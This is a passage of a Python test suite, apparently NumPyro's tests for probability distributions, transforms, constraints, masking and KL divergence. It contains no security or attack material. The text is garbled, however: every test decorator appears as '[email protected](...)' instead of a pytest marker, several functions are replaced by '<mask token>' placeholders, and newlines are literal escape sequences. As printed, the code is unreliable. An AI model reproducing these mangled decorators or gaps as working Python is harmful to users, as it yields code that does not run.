d_jax.loc.shape[:len(ix)])\n jnp.allclose(jnp.mean(samples_re[ix], 0), jnp.squeeze(d_jax\n .mean[ix_loc]), rtol=0.5, atol=0.01)\n samples_mvn = jnp.squeeze(samples_re[ix]).reshape(\n sample_shape + (-1,), order='F')\n ix_col = get_min_shape(ix, d_jax.scale_tril_column.shape[:\n len(ix)])\n ix_row = get_min_shape(ix, d_jax.scale_tril_row.shape[:len(ix)]\n )\n scale_tril = my_kron(d_jax.scale_tril_column[ix_col], d_jax\n .scale_tril_row[ix_row])\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=0.01\n )\n else:\n jnp.allclose(jnp.mean(samples, 0), jnp.squeeze(d_jax.mean),\n rtol=0.5, atol=0.01)\n samples_mvn = jnp.squeeze(samples).reshape(sample_shape + (-1,),\n order='F')\n scale_tril = my_kron(jnp.squeeze(d_jax.scale_tril_column), jnp.\n squeeze(d_jax.scale_tril_row))\n sample_scale_tril = jnp.linalg.cholesky(jnp.cov(samples_mvn.T))\n jnp.allclose(sample_scale_tril, scale_tril, atol=0.5, rtol=0.01)\n else:\n if jnp.all(jnp.isfinite(d_jax.mean)):\n assert_allclose(jnp.mean(samples, 0), d_jax.mean, rtol=0.05,\n atol=0.01)\n if isinstance(d_jax, dist.CAR):\n pytest.skip(\n 'CAR distribution does not have `variance` implemented.')\n if isinstance(d_jax, dist.Gompertz):\n pytest.skip(\n 'Gompertz distribution does not have `variance` implemented.')\n if jnp.all(jnp.isfinite(d_jax.variance)):\n assert_allclose(jnp.std(samples, 0), jnp.sqrt(d_jax.variance),\n rtol=0.05, atol=0.01)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\[email protected]('prepend_shape', [(), (2,), (2, 3)])\ndef test_distribution_constraints(jax_dist, sp_dist, params, prepend_shape):\n if jax_dist in (_TruncatedNormal, _TruncatedCauchy, _GaussianMixture,\n _Gaussian2DMixture, _GeneralMixture, _General2DMixture):\n pytest.skip(f'{jax_dist.__name__} is a function, not a class')\n dist_args = [p for p in inspect.getfullargspec(jax_dist.__init__)[0][1:]]\n valid_params, oob_params = list(params), list(params)\n key = random.PRNGKey(1)\n dependent_constraint = False\n for i in range(len(params)):\n if jax_dist in (_ImproperWrapper, dist.LKJ, dist.LKJCholesky\n ) and dist_args[i] != 'concentration':\n continue\n if 'SineSkewed' in jax_dist.__name__ and dist_args[i] != 'skewness':\n continue\n if jax_dist is dist.EulerMaruyama and dist_args[i] != 't':\n continue\n if jax_dist is dist.TwoSidedTruncatedDistribution and dist_args[i\n ] == 'base_dist':\n continue\n if jax_dist is dist.GaussianRandomWalk and dist_args[i] == 'num_steps':\n continue\n if jax_dist is dist.SineBivariateVonMises and dist_args[i\n ] == 'weighted_correlation':\n continue\n if params[i] is None:\n oob_params[i] = None\n valid_params[i] = None\n continue\n constraint = jax_dist.arg_constraints[dist_args[i]]\n if isinstance(constraint, constraints._Dependent):\n dependent_constraint = True\n break\n key, key_gen = random.split(key)\n oob_params[i] = gen_values_outside_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n valid_params[i] = gen_values_within_bounds(constraint, jnp.shape(\n params[i]), key_gen)\n if jax_dist is dist.MultivariateStudentT:\n valid_params[0] += 1\n if jax_dist is dist.LogUniform:\n valid_params[1] += valid_params[0]\n assert jax_dist(*oob_params)\n if not dependent_constraint and (jax_dist is not _ImproperWrapper and \n 'SineSkewed' not in jax_dist.__name__):\n with pytest.raises(ValueError):\n jax_dist(*oob_params, validate_args=True)\n with pytest.raises(ValueError):\n oob_params = jax.device_get(oob_params)\n\n 
def dist_gen_fn():\n d = jax_dist(*oob_params, validate_args=True)\n return d\n jax.jit(dist_gen_fn)()\n d = jax_dist(*valid_params, validate_args=True)\n if sp_dist and not _is_batched_multivariate(d) and not (d.event_shape and\n prepend_shape):\n valid_samples = gen_values_within_bounds(d.support, size=\n prepend_shape + d.batch_shape + d.event_shape)\n try:\n expected = sp_dist(*valid_params).logpdf(valid_samples)\n except AttributeError:\n expected = sp_dist(*valid_params).logpmf(valid_samples)\n assert_allclose(d.log_prob(valid_samples), expected, atol=1e-05,\n rtol=1e-05)\n oob_samples = gen_values_outside_bounds(d.support, size=prepend_shape +\n d.batch_shape + d.event_shape)\n with pytest.warns(UserWarning, match='Out-of-support'):\n d.log_prob(oob_samples)\n with pytest.warns(UserWarning, match='Out-of-support'):\n oob_samples = jax.device_get(oob_samples)\n valid_params = jax.device_get(valid_params)\n\n def log_prob_fn():\n d = jax_dist(*valid_params, validate_args=True)\n return d.log_prob(oob_samples)\n jax.jit(log_prob_fn)()\n\n\ndef test_omnistaging_invalid_param():\n\n def f(x):\n return dist.LogNormal(x, -np.ones(2), validate_args=True).log_prob(0)\n with pytest.raises(ValueError, match='got invalid'):\n jax.jit(f)(0)\n\n\ndef test_omnistaging_invalid_sample():\n\n def f(x):\n return dist.LogNormal(x, np.ones(2), validate_args=True).log_prob(-1)\n with pytest.warns(UserWarning, match='Out-of-support'):\n jax.jit(f)(0)\n\n\ndef test_categorical_log_prob_grad():\n data = jnp.repeat(jnp.arange(3), 10)\n\n def f(x):\n return dist.Categorical(jax.nn.softmax(x * jnp.arange(1, 4))).log_prob(\n data).sum()\n\n def g(x):\n return dist.Categorical(logits=x * jnp.arange(1, 4)).log_prob(data\n ).sum()\n x = 0.5\n fx, grad_fx = jax.value_and_grad(f)(x)\n gx, grad_gx = jax.value_and_grad(g)(x)\n assert_allclose(fx, gx, rtol=1e-06)\n assert_allclose(grad_fx, grad_gx, atol=0.0001)\n\n\ndef test_beta_proportion_invalid_mean():\n with dist.distribution.validation_enabled(), pytest.raises(ValueError,\n match='^BetaProportion distribution got invalid mean parameter\\\\.$'):\n dist.BetaProportion(1.0, 1.0)\n\n\[email protected]('constraint, x, expected', [(constraints.boolean,\n np.array([True, False]), np.array([True, True])), (constraints.boolean,\n np.array([1, 1]), np.array([True, True])), (constraints.boolean, np.\n array([-1, 1]), np.array([False, True])), (constraints.corr_cholesky,\n np.array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]), np.array([True, False\n ])), (constraints.corr_cholesky, np.array([[[1, 0], [1, 0]], [[1, 0], [\n 0.5, 0.5]]]), np.array([False, False])), (constraints.corr_matrix, np.\n array([[[1, 0], [0, 1]], [[1, 0.1], [0, 1]]]), np.array([True, False])),\n (constraints.corr_matrix, np.array([[[1, 0], [1, 0]], [[1, 0], [0.5, \n 0.5]]]), np.array([False, False])), (constraints.greater_than(1), 3, \n True), (constraints.greater_than(1), np.array([-1, 1, 5]), np.array([\n False, False, True])), (constraints.integer_interval(-3, 5), 0, True),\n (constraints.integer_interval(-3, 5), np.array([-5, -3, 0, 1.1, 5, 7]),\n np.array([False, True, True, False, True, False])), (constraints.\n interval(-3, 5), 0, True), (constraints.interval(-3, 5), np.array([-5, \n -3, 0, 5, 7]), np.array([False, True, True, True, False])), (\n constraints.less_than(1), -2, True), (constraints.less_than(1), np.\n array([-1, 1, 5]), np.array([True, False, False])), (constraints.\n lower_cholesky, np.array([[1.0, 0.0], [-2.0, 0.1]]), True), (\n constraints.lower_cholesky, np.array([[[1.0, 0.0], 
[-2.0, -0.1]], [[1.0,\n 0.1], [2.0, 0.2]]]), np.array([False, False])), (constraints.\n nonnegative_integer, 3, True), (constraints.nonnegative_integer, np.\n array([-1.0, 0.0, 5.0]), np.array([False, True, True])), (constraints.\n positive, 3, True), (constraints.positive, np.array([-1, 0, 5]), np.\n array([False, False, True])), (constraints.positive_definite, np.array(\n [[1.0, 0.3], [0.3, 1.0]]), True), (constraints.positive_definite, np.\n array([[[2.0, 0.4], [0.3, 2.0]], [[1.0, 0.1], [0.1, 0.0]]]), np.array([\n False, False])), (constraints.positive_integer, 3, True), (constraints.\n positive_integer, np.array([-1.0, 0.0, 5.0]), np.array([False, False, \n True])), (constraints.real, -1, True), (constraints.real, np.array([np.\n inf, -np.inf, np.nan, np.pi]), np.array([False, False, False, True])),\n (constraints.simplex, np.array([0.1, 0.3, 0.6]), True), (constraints.\n simplex, np.array([[0.1, 0.3, 0.6], [-0.1, 0.6, 0.5], [0.1, 0.6, 0.5]]),\n np.array([True, False, False])), (constraints.softplus_positive, 3, \n True), (constraints.softplus_positive, np.array([-1, 0, 5]), np.array([\n False, False, True])), (constraints.softplus_lower_cholesky, np.array([\n [1.0, 0.0], [-2.0, 0.1]]), True), (constraints.softplus_lower_cholesky,\n np.array([[[1.0, 0.0], [-2.0, -0.1]], [[1.0, 0.1], [2.0, 0.2]]]), np.\n array([False, False])), (constraints.unit_interval, 0.1, True), (\n constraints.unit_interval, np.array([-5, 0, 0.5, 1, 7]), np.array([\n False, True, True, True, False])), (constraints.sphere, np.array([[1, 0,\n 0], [0.5, 0.5, 0]]), np.array([True, False])), (constraints.\n open_interval(0.0, 1.0), np.array([-5, 0, 0.5, 1, 7]), np.array([False,\n False, True, False, False]))])\ndef test_constraints(constraint, x, expected):\n v = constraint.feasible_like(x)\n if jnp.result_type(v) == 'float32' or jnp.result_type(v) == 'float64':\n assert not constraint.is_discrete\n assert_array_equal(constraint(x), expected)\n feasible_value = constraint.feasible_like(x)\n assert jnp.shape(feasible_value) == jnp.shape(x)\n assert_allclose(constraint(feasible_value), jnp.full(jnp.shape(expected\n ), True))\n try:\n inverse = biject_to(constraint).inv(feasible_value)\n except NotImplementedError:\n pass\n else:\n assert_allclose(inverse, jnp.zeros_like(inverse), atol=2e-07)\n\n\[email protected]('constraint', [constraints.corr_cholesky,\n constraints.corr_matrix, constraints.greater_than(2), constraints.\n interval(-3, 5), constraints.l1_ball, constraints.less_than(1),\n constraints.lower_cholesky, constraints.scaled_unit_lower_cholesky,\n constraints.ordered_vector, constraints.positive, constraints.\n positive_definite, constraints.positive_ordered_vector, constraints.\n real, constraints.real_vector, constraints.simplex, constraints.\n softplus_positive, constraints.softplus_lower_cholesky, constraints.\n unit_interval, constraints.open_interval(0.0, 1.0)], ids=lambda x: x.\n __class__)\[email protected]('shape', [(), (1,), (3,), (6,), (3, 1), (1, 3), (5,\n 3)])\ndef test_biject_to(constraint, shape):\n transform = biject_to(constraint)\n event_dim = transform.domain.event_dim\n if isinstance(constraint, constraints._Interval):\n assert transform.codomain.upper_bound == constraint.upper_bound\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._GreaterThan):\n assert transform.codomain.lower_bound == constraint.lower_bound\n elif isinstance(constraint, constraints._LessThan):\n assert transform.codomain.upper_bound == constraint.upper_bound\n if 
len(shape) < event_dim:\n return\n rng_key = random.PRNGKey(0)\n x = random.normal(rng_key, shape)\n y = transform(x)\n assert transform.forward_shape(x.shape) == y.shape\n assert transform.inverse_shape(y.shape) == x.shape\n x_nan = transform.inv(jnp.full(jnp.shape(y), np.nan))\n assert x_nan.shape == x.shape\n batch_shape = shape if event_dim == 0 else shape[:-1]\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape, dtype=\n jnp.bool_))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-05, rtol=1e-05)\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert jnp.shape(actual) == batch_shape\n if len(shape) == event_dim:\n if constraint is constraints.simplex:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x)[:-1, :])[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y)\n [:, :-1])[1]\n elif constraint in [constraints.real_vector, constraints.\n ordered_vector, constraints.positive_ordered_vector,\n constraints.l1_ball]:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n elif constraint in [constraints.corr_cholesky, constraints.corr_matrix\n ]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x),\n diagonal=-1)\n y_tril = matrix_to_tril_vec(y, diagonal=-1)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y, diagonal=-1)\n if constraint is constraints.corr_matrix:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1\n ) + jnp.identity(matrix.shape[-1])\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n elif constraint in [constraints.lower_cholesky, constraints.\n scaled_unit_lower_cholesky, constraints.positive_definite,\n constraints.softplus_lower_cholesky]:\n vec_transform = lambda x: matrix_to_tril_vec(transform(x))\n y_tril = matrix_to_tril_vec(y)\n\n def inv_vec_transform(y):\n matrix = vec_to_tril_matrix(y)\n if constraint is constraints.positive_definite:\n matrix = matrix + jnp.swapaxes(matrix, -2, -1) - jnp.diag(\n jnp.diag(matrix))\n return transform.inv(matrix)\n expected = np.linalg.slogdet(jax.jacobian(vec_transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(inv_vec_transform\n )(y_tril))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-05, rtol=1e-05)\n assert_allclose(actual, -inv_expected, atol=1e-05, rtol=1e-05)\n\n\[email protected]('transform, event_shape', [(PermuteTransform(np.\n array([3, 0, 4, 1, 2])), (5,)), (PowerTransform(2.0), ()), (\n SoftplusTransform(), ()), (LowerCholeskyAffine(np.array([1.0, 2.0]), np\n .array([[0.6, 0.0], [1.5, 0.4]])), (2,)), (transforms.ComposeTransform(\n [biject_to(constraints.simplex), SimplexToOrderedTransform(0.0),\n biject_to(constraints.ordered_vector).inv]), (5,))])\[email protected]('batch_shape', [(), (1,), (3,), (6,), (3, 1), (1, \n 3), (5, 3)])\ndef test_bijective_transforms(transform, event_shape, batch_shape):\n shape = batch_shape + event_shape\n rng_key = random.PRNGKey(0)\n x = biject_to(transform.domain)(random.normal(rng_key, shape))\n y = transform(x)\n assert_array_equal(transform.codomain(y), jnp.ones(batch_shape))\n z = transform.inv(y)\n assert_allclose(x, z, atol=1e-06, rtol=0.0001)\n assert transform.inv.inv is transform\n assert transform.inv is 
transform.inv\n assert transform.domain is transform.inv.codomain\n assert transform.codomain is transform.inv.domain\n assert_array_equal(transform.domain(z), jnp.ones(batch_shape))\n actual = transform.log_abs_det_jacobian(x, y)\n assert_allclose(actual, -transform.inv.log_abs_det_jacobian(y, x))\n assert jnp.shape(actual) == batch_shape\n if len(shape) == transform.domain.event_dim:\n if len(event_shape) == 1:\n expected = np.linalg.slogdet(jax.jacobian(transform)(x))[1]\n inv_expected = np.linalg.slogdet(jax.jacobian(transform.inv)(y))[1]\n else:\n expected = jnp.log(jnp.abs(grad(transform)(x)))\n inv_expected = jnp.log(jnp.abs(grad(transform.inv)(y)))\n assert_allclose(actual, expected, atol=1e-06)\n assert_allclose(actual, -inv_expected, atol=1e-06)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t1])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 2\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, y / 2\n ) + jnp.log(2) * 9\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_composed_transform_1(batch_shape):\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n t = transforms.ComposeTransform([t1, t2, t2])\n assert t.domain.event_dim == 1\n assert t.codomain.event_dim == 3\n x = np.random.normal(size=batch_shape + (6,))\n y = t(x)\n log_det = t.log_abs_det_jacobian(x, y)\n assert log_det.shape == batch_shape\n z = t2(x * 2)\n expected_log_det = jnp.log(2) * 6 + t2.log_abs_det_jacobian(x * 2, z\n ) + t2.log_abs_det_jacobian(z, t2(z)).sum(-1)\n assert_allclose(log_det, expected_log_det)\n\n\[email protected]('batch_shape', [(), (5,)])\ndef test_simplex_to_order_transform(batch_shape):\n simplex = jnp.arange(5.0) / jnp.arange(5.0).sum()\n simplex = jnp.broadcast_to(simplex, batch_shape + simplex.shape)\n transform = SimplexToOrderedTransform()\n out = transform(simplex)\n assert out.shape == transform.forward_shape(simplex.shape)\n assert simplex.shape == transform.inverse_shape(out.shape)\n\n\[email protected]('batch_shape', [(), (5,)])\[email protected]('prepend_event_shape', [(), (4,)])\[email protected]('sample_shape', [(), (7,)])\ndef test_transformed_distribution(batch_shape, prepend_event_shape,\n sample_shape):\n base_dist = dist.Normal(0, 1).expand(batch_shape + prepend_event_shape +\n (6,)).to_event(1 + len(prepend_event_shape))\n t1 = transforms.AffineTransform(0, 2)\n t2 = transforms.LowerCholeskyTransform()\n d = dist.TransformedDistribution(base_dist, [t1, t2, t1])\n assert d.event_dim == 2 + len(prepend_event_shape)\n y = d.sample(random.PRNGKey(0), sample_shape)\n t = transforms.ComposeTransform([t1, t2, t1])\n x = t.inv(y)\n assert x.shape == sample_shape + base_dist.shape()\n log_prob = d.log_prob(y)\n assert log_prob.shape == sample_shape + batch_shape\n t_log_det = t.log_abs_det_jacobian(x, y)\n if prepend_event_shape:\n t_log_det = t_log_det.sum(-1)\n expected_log_prob = base_dist.log_prob(x) - t_log_det\n assert_allclose(log_prob, expected_log_prob, atol=1e-05)\n\n\[email protected]('transformed_dist', [dist.TransformedDistribution(\n dist.Normal(np.array([2.0, 3.0]), 1.0), transforms.ExpTransform()),\n 
dist.TransformedDistribution(dist.Exponential(jnp.ones(2)), [transforms\n .PowerTransform(0.7), transforms.AffineTransform(0.0, jnp.ones(2) * 3)])])\ndef test_transformed_distribution_intermediates(transformed_dist):\n sample, intermediates = transformed_dist.sample_with_intermediates(random\n .PRNGKey(1))\n assert_allclose(transformed_dist.log_prob(sample, intermediates),\n transformed_dist.log_prob(sample))\n\n\ndef test_transformed_transformed_distribution():\n loc, scale = -2, 3\n dist1 = dist.TransformedDistribution(dist.Normal(2, 3), transforms.\n PowerTransform(2.0))\n dist2 = dist.TransformedDistribution(dist1, transforms.AffineTransform(\n -2, 3))\n assert isinstance(dist2.base_dist, dist.Normal)\n assert len(dist2.transforms) == 2\n assert isinstance(dist2.transforms[0], transforms.PowerTransform)\n assert isinstance(dist2.transforms[1], transforms.AffineTransform)\n rng_key = random.PRNGKey(0)\n assert_allclose(loc + scale * dist1.sample(rng_key), dist2.sample(rng_key))\n intermediates = dist2.sample_with_intermediates(rng_key)\n assert len(intermediates) == 2\n\n\n<mask token>\n\n\[email protected]('ts', [[transforms.PowerTransform(0.7), transforms\n .AffineTransform(2.0, 3.0)], [transforms.ExpTransform()], [transforms.\n ComposeTransform([transforms.AffineTransform(-2, 3), transforms.\n ExpTransform()]), transforms.PowerTransform(3.0)], [_make_iaf(5,\n hidden_dims=[10], rng_key=random.PRNGKey(0)), transforms.\n PermuteTransform(jnp.arange(5)[::-1]), _make_iaf(5, hidden_dims=[10],\n rng_key=random.PRNGKey(1))]])\ndef test_compose_transform_with_intermediates(ts):\n transform = transforms.ComposeTransform(ts)\n x = random.normal(random.PRNGKey(2), (7, 5))\n y, intermediates = transform.call_with_intermediates(x)\n logdet = transform.log_abs_det_jacobian(x, y, intermediates)\n assert_allclose(y, transform(x))\n assert_allclose(logdet, transform.log_abs_det_jacobian(x, y))\n\n\[email protected]('x_dim, y_dim', [(3, 3), (3, 4)])\ndef test_unpack_transform(x_dim, y_dim):\n xy = np.random.randn(x_dim + y_dim)\n unpack_fn = lambda xy: {'x': xy[:x_dim], 'y': xy[x_dim:]}\n transform = transforms.UnpackTransform(unpack_fn)\n z = transform(xy)\n if x_dim == y_dim:\n with pytest.warns(UserWarning, match='UnpackTransform.inv'):\n t = transform.inv(z)\n else:\n t = transform.inv(z)\n assert_allclose(t, xy)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS)\ndef test_generated_sample_distribution(jax_dist, sp_dist, params, N_sample=\n 100000, key=random.PRNGKey(11)):\n \"\"\"On samplers that we do not get directly from JAX, (e.g. 
we only get\n Gumbel(0,1) but also provide samplers for Gumbel(loc, scale)), also test\n agreement in the empirical distribution of generated samples between our\n samplers and those from SciPy.\n \"\"\"\n if jax_dist not in [dist.Gumbel]:\n pytest.skip(\n '{} sampling method taken from upstream, no need totest generated samples.'\n .format(jax_dist.__name__))\n jax_dist = jax_dist(*params)\n if sp_dist and not jax_dist.event_shape and not jax_dist.batch_shape:\n our_samples = jax_dist.sample(key, (N_sample,))\n ks_result = osp.kstest(our_samples, sp_dist(*params).cdf)\n assert ks_result.pvalue > 0.05\n\n\[email protected]('jax_dist, params, support', [(dist.\n BernoulliLogits, (5.0,), jnp.arange(2)), (dist.BernoulliProbs, (0.5,),\n jnp.arange(2)), (dist.BinomialLogits, (4.5, 10), jnp.arange(11)), (dist\n .BinomialProbs, (0.5, 11), jnp.arange(12)), (dist.BetaBinomial, (2.0, \n 0.5, 12), jnp.arange(13)), (dist.CategoricalLogits, (np.array([3.0, 4.0,\n 5.0]),), jnp.arange(3)), (dist.CategoricalProbs, (np.array([0.1, 0.5, \n 0.4]),), jnp.arange(3))])\[email protected]('batch_shape', [(5,), ()])\[email protected]('expand', [False, True])\ndef test_enumerate_support_smoke(jax_dist, params, support, batch_shape, expand\n ):\n p0 = jnp.broadcast_to(params[0], batch_shape + jnp.shape(params[0]))\n actual = jax_dist(p0, *params[1:]).enumerate_support(expand=expand)\n expected = support.reshape((-1,) + (1,) * len(batch_shape))\n if expand:\n expected = jnp.broadcast_to(expected, support.shape + batch_shape)\n assert_allclose(actual, expected)\n\n\ndef test_zero_inflated_enumerate_support():\n base_dist = dist.Bernoulli(0.5)\n d = dist.ZeroInflatedDistribution(base_dist, gate=0.5)\n assert d.has_enumerate_support\n assert_allclose(d.enumerate_support(), base_dist.enumerate_support())\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE)\[email protected]('prepend_shape', [(), (2, 3)])\[email protected]('sample_shape', [(), (4,)])\ndef test_expand(jax_dist, sp_dist, params, prepend_shape, sample_shape):\n jax_dist = jax_dist(*params)\n new_batch_shape = prepend_shape + jax_dist.batch_shape\n expanded_dist = jax_dist.expand(new_batch_shape)\n rng_key = random.PRNGKey(0)\n samples = expanded_dist.sample(rng_key, sample_shape)\n assert expanded_dist.batch_shape == new_batch_shape\n assert samples.shape == sample_shape + new_batch_shape + jax_dist.event_shape\n assert expanded_dist.log_prob(samples\n ).shape == sample_shape + new_batch_shape\n assert expanded_dist.expand((3,) + new_batch_shape).batch_shape == (3,\n ) + new_batch_shape\n if prepend_shape:\n with pytest.raises(ValueError, match=\n 'Cannot broadcast distribution of shape'):\n assert expanded_dist.expand((3,) + jax_dist.batch_shape)\n\n\[email protected]('base_shape', [(2, 1, 5), (3, 1), (2, 1, 1), (1, 1,\n 5)])\[email protected]('event_dim', [0, 1, 2, 3])\[email protected]('sample_shape', [(1000,), (1000, 7, 1), (1000, 1, 7)])\ndef test_expand_shuffle_regression(base_shape, event_dim, sample_shape):\n expand_shape = 2, 3, 5\n event_dim = min(event_dim, len(base_shape))\n loc = random.normal(random.PRNGKey(0), base_shape) * 10\n base_dist = dist.Normal(loc, 0.1).to_event(event_dim)\n expanded_dist = base_dist.expand(expand_shape[:len(expand_shape) -\n event_dim])\n samples = expanded_dist.sample(random.PRNGKey(1), sample_shape)\n expected_mean = jnp.broadcast_to(loc, sample_shape[1:] + expanded_dist.\n shape())\n assert_allclose(samples.mean(0), expected_mean, atol=0.1)\n\n\n<mask token>\n\n\ndef 
test_sine_bivariate_von_mises_sample_mean():\n loc = jnp.array([[2.0, -1.0], [-2, 1.0]])\n sine = SineBivariateVonMises(*loc, 5000, 5000, 0.0)\n samples = sine.sample(random.PRNGKey(0), (5000,))\n assert_allclose(_circ_mean(samples).T, loc, rtol=0.005)\n\n\[email protected]('batch_shape', [(), (4,)])\ndef test_polya_gamma(batch_shape, num_points=20000):\n d = dist.TruncatedPolyaGamma(batch_shape=batch_shape)\n rng_key = random.PRNGKey(0)\n x = jnp.linspace(1e-06, d.truncation_point, num_points)\n prob = d.truncation_point / num_points * jnp.exp(logsumexp(d.log_prob(x\n ), axis=-1))\n assert_allclose(prob, jnp.ones(batch_shape), rtol=0.0001)\n z = d.sample(rng_key, sample_shape=(3000,))\n mean = jnp.mean(z, axis=-1)\n assert_allclose(mean, 0.25 * jnp.ones(batch_shape), rtol=0.07)\n\n\[email protected]('extra_event_dims,expand_shape', [(0, (4, 3, 2, 1)\n ), (0, (4, 3, 2, 2)), (1, (5, 4, 3, 2)), (2, (5, 4, 3))])\ndef test_expand_reshaped_distribution(extra_event_dims, expand_shape):\n loc = jnp.zeros((1, 6))\n scale_tril = jnp.eye(6)\n d = dist.MultivariateNormal(loc, scale_tril=scale_tril)\n full_shape = 4, 1, 1, 1, 6\n reshaped_dist = d.expand([4, 1, 1, 1]).to_event(extra_event_dims)\n cut = 4 - extra_event_dims\n batch_shape, event_shape = full_shape[:cut], full_shape[cut:]\n assert reshaped_dist.batch_shape == batch_shape\n assert reshaped_dist.event_shape == event_shape\n large = reshaped_dist.expand(expand_shape)\n assert large.batch_shape == expand_shape\n assert large.event_shape == event_shape\n with pytest.raises((RuntimeError, ValueError)):\n reshaped_dist.expand(expand_shape + (3,))\n with pytest.raises((RuntimeError, ValueError)):\n large.expand(expand_shape[1:])\n\n\[email protected]('batch_shape, mask_shape', [((), ()), ((2,), ()),\n ((), (2,)), ((2,), (2,)), ((4, 2), (1, 2)), ((2,), (4, 2))])\[email protected]('event_shape', [(), (3,)])\ndef test_mask(batch_shape, event_shape, mask_shape):\n jax_dist = dist.Normal().expand(batch_shape + event_shape).to_event(len\n (event_shape))\n mask = dist.Bernoulli(0.5).sample(random.PRNGKey(0), mask_shape)\n if mask_shape == ():\n mask = bool(mask)\n samples = jax_dist.sample(random.PRNGKey(1))\n actual = jax_dist.mask(mask).log_prob(samples)\n assert_allclose(actual != 0, jnp.broadcast_to(mask, lax.\n broadcast_shapes(batch_shape, mask_shape)))\n\n\[email protected]('event_shape', [(), (4,), (2, 4)])\ndef test_mask_grad(event_shape):\n\n def f(x, data):\n base_dist = dist.Beta(jnp.exp(x), jnp.ones(event_shape)).to_event()\n mask = jnp.all(jnp.isfinite(data), tuple(-i - 1 for i in range(len(\n event_shape))))\n log_prob = base_dist.mask(mask).log_prob(data)\n assert log_prob.shape == data.shape[:len(data.shape) - len(event_shape)\n ]\n return log_prob.sum()\n data = np.array([[0.4, np.nan, 0.2, np.nan], [0.5, 0.5, 0.5, 0.5]])\n log_prob, grad = jax.value_and_grad(f)(1.0, data)\n assert jnp.isfinite(grad) and jnp.isfinite(log_prob)\n\n\[email protected]('jax_dist, sp_dist, params', CONTINUOUS + DISCRETE +\n DIRECTIONAL)\ndef test_dist_pytree(jax_dist, sp_dist, params):\n\n def f(x):\n return jax_dist(*params)\n if jax_dist is _ImproperWrapper:\n pytest.skip('Cannot flattening ImproperUniform')\n if jax_dist is dist.EulerMaruyama:\n pytest.skip(\"EulerMaruyama doesn't define flatten/unflatten\")\n jax.jit(f)(0)\n lax.map(f, np.ones(3))\n expected_dist = f(0)\n actual_dist = jax.jit(f)(0)\n expected_sample = expected_dist.sample(random.PRNGKey(0))\n actual_sample = actual_dist.sample(random.PRNGKey(0))\n expected_log_prob = 
expected_dist.log_prob(expected_sample)\n actual_log_prob = actual_dist.log_prob(actual_sample)\n assert_allclose(actual_sample, expected_sample, rtol=1e-06)\n assert_allclose(actual_log_prob, expected_log_prob, rtol=2e-06)\n\n\n<mask token>\n\n\ndef test_expand_no_unnecessary_batch_shape_expansion():\n for arg in (jnp.array(1.0), jnp.ones((2,)), jnp.ones((2, 2))):\n d = dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n roundtripped_d = type(d).tree_unflatten(*d.tree_flatten()[::-1])\n assert d.batch_shape == roundtripped_d.batch_shape\n assert d.base_dist.batch_shape == roundtripped_d.base_dist.batch_shape\n assert d.base_dist.event_shape == roundtripped_d.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, roundtripped_d.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, roundtripped_d.base_dist.scale)\n\n def bs(arg):\n return dist.Normal(arg, arg).expand([10, 3, *arg.shape])\n d = bs(arg)\n dj = jax.jit(bs)(arg)\n assert isinstance(d, dist.ExpandedDistribution)\n assert isinstance(dj, dist.ExpandedDistribution)\n assert d.batch_shape == dj.batch_shape\n assert d.base_dist.batch_shape == dj.base_dist.batch_shape\n assert d.base_dist.event_shape == dj.base_dist.event_shape\n assert jnp.allclose(d.base_dist.loc, dj.base_dist.loc)\n assert jnp.allclose(d.base_dist.scale, dj.base_dist.scale)\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\ndef test_kl_delta_normal_shape(batch_shape):\n v = np.random.normal(size=batch_shape)\n loc = np.random.normal(size=batch_shape)\n scale = np.exp(np.random.normal(size=batch_shape))\n p = dist.Delta(v)\n q = dist.Normal(loc, scale)\n assert kl_divergence(p, q).shape == batch_shape\n\n\ndef test_kl_delta_normal():\n v = np.random.normal()\n loc = np.random.normal()\n scale = np.exp(np.random.normal())\n p = dist.Delta(v, 10.0)\n q = dist.Normal(loc, scale)\n assert_allclose(kl_divergence(p, q), 10.0 - q.log_prob(v))\n\n\[email protected]('batch_shape', [(), (4,), (2, 3)], ids=str)\[email protected]('event_shape', [(), (4,), (2, 3)], 